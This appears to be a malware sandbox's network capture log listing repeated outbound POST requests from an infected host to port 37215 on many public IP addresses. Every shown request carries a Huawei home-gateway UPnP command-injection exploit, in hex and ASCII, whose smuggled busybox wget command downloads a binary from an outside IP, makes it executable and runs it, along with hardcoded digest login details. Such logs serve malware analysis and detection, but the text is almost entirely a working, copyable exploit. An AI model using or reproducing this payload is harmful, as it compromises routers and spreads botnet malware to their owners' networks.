                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              744192.168.2.1557058190.141.179.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226808071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              745192.168.2.1560130102.49.59.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226845980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              746192.168.2.153794494.102.177.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226845980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              747192.168.2.1544670102.39.135.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226847887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              748192.168.2.1560920211.106.229.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226847887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              749192.168.2.1535630222.198.249.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226856947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              750192.168.2.1533768197.102.147.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226857901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              751192.168.2.1544534157.23.170.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226898909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              752192.168.2.1544054186.226.124.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226943016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              753192.168.2.154958245.72.98.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226948023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
